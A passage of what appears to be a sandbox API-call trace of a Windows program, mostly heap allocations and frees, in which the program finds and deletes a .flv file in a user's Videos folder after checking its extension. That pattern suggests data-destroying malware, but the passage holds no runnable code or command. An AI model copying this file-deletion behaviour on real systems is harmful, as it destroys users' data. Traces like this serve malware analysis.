dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0041.976] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\S24Ya.flv", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x726f64d0, ftCreationTime.dwHighDateTime=0x1d5c1d7, ftLastAccessTime.dwLowDateTime=0xc0080c50, ftLastAccessTime.dwHighDateTime=0x1d5bb48, ftLastWriteTime.dwLowDateTime=0x18ba98a0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x109f6, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="S24Ya.flv", cAlternateFileName="")) returned 0x7c2240 [0041.976] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\S24Ya.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\s24ya.flv")) returned 1 [0041.978] FindNextFileW (in: hFindFile=0x7c2240, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x726f64d0, ftCreationTime.dwHighDateTime=0x1d5c1d7, ftLastAccessTime.dwLowDateTime=0xc0080c50, ftLastAccessTime.dwHighDateTime=0x1d5bb48, ftLastWriteTime.dwLowDateTime=0x18ba98a0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x109f6, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="S24Ya.flv", cAlternateFileName="")) returned 0 [0041.978] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0041.978] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3688 | out: hHeap=0x770000) returned 1 [0041.978] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0041.978] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0041.978] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0041.978] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87a9d8 | out: hHeap=0x770000) returned 1 [0041.978] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0041.978] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0041.978] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0041.978] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0041.978] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.978] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0041.978] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0041.978] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0041.978] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0041.978] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0041.978] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0041.978] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0041.978] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0041.978] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b20 | out: hHeap=0x770000) returned 1 [0041.978] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0041.978] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0041.978] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0041.978] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0041.978] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0041.978] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0041.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ac320 | out: hHeap=0x770000) returned 1 [0041.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0041.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab2010 | out: hHeap=0x770000) returned 1 [0041.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0041.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0041.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0041.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0041.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1698 | out: hHeap=0x770000) returned 1 [0041.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0041.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0041.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0041.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0041.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0041.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0041.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0041.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0041.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0041.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0041.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0041.979] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.979] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0041.979] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0041.979] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0041.979] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0041.979] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0041.979] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0041.979] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0041.979] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0041.979] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0041.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0041.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0041.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0041.980] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0041.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0041.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0041.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0041.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0041.980] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0041.980] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0041.980] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0041.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0041.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af7c8 [0041.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0041.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0041.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0041.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0041.980] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0041.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cdc0 [0041.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0041.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0041.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0041.980] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0041.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0041.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0041.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0041.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0041.980] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0041.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0041.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0041.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0041.980] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0041.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0041.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0041.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0041.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0041.981] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0041.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0041.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0041.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0041.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0041.981] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0041.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0041.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0041.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0041.981] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0041.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0041.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0041.981] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0041.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0041.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0041.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0041.981] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0041.981] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0041.981] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.981] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.981] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="flv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.981] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".flv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0041.981] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0041.981] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0041.981] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0041.981] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0041.981] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0041.981] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0041.982] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0041.982] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0041.982] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0041.982] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0041.982] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0041.982] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0041.982] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0041.982] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0041.982] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0041.982] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0041.982] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0041.982] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0041.982] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0041.982] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0041.982] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0041.982] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0041.982] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0041.982] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0041.982] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0041.982] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0041.982] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0041.982] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0041.982] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0041.982] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0041.982] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0041.982] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0041.982] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0041.982] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0041.982] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0041.982] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0041.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0041.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0041.983] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0041.983] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0041.983] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0041.983] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0041.983] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0041.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0041.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0041.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0041.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0041.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0041.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0041.983] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0041.983] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0041.983] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0041.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0041.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0041.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0041.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1850 | out: hHeap=0x770000) returned 1 [0041.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0041.983] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0041.983] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0041.983] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0041.983] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0041.983] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0041.983] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0041.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0041.983] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0041.983] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0041.984] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0041.984] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0041.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0041.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0041.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0041.984] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0041.984] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0041.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0041.984] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87a9d8 [0041.984] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0041.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0041.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0041.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0041.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1850 | out: hHeap=0x770000) returned 1 [0041.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0041.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0041.984] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0041.984] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0041.984] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0041.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0041.984] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0041.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0041.984] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0041.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0041.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0041.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0041.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b20 | out: hHeap=0x770000) returned 1 [0041.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0041.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0041.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0041.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0041.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0041.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0041.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0041.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0041.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0041.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0041.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0041.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1698 | out: hHeap=0x770000) returned 1 [0041.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0041.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0041.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0041.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0041.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0041.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0041.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0041.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0041.985] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0041.985] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0041.985] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0041.985] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xe0) returned 0xab0028 [0041.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87a9d8 | out: hHeap=0x770000) returned 1 [0041.985] HeapFree (in: 